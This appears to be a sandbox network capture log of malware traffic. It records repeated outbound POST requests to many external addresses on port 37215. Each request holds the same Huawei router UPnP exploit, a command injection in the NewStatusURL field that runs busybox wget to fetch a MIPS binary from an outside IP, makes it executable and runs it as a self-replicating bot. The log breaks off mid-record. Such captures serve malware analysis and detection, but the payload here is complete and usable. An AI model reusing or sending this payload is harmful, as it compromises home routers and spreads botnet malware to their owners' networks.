                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  424192.168.2.1349148157.31.31.24537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.277537107 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  425192.168.2.1346870157.112.233.14337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.277554989 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  426192.168.2.1349564108.13.23.10437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.277573109 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  427192.168.2.1348750157.145.62.2437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.277592897 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  428192.168.2.1344916130.62.245.21037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.277610064 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  429192.168.2.1346306157.187.116.3937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.277631998 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  430192.168.2.1349534197.150.70.16437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.277652979 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  431192.168.2.134561890.226.166.12337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.277669907 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  432192.168.2.135913841.115.24.15337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.277688980 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  433192.168.2.133887841.162.106.20637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.277709961 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 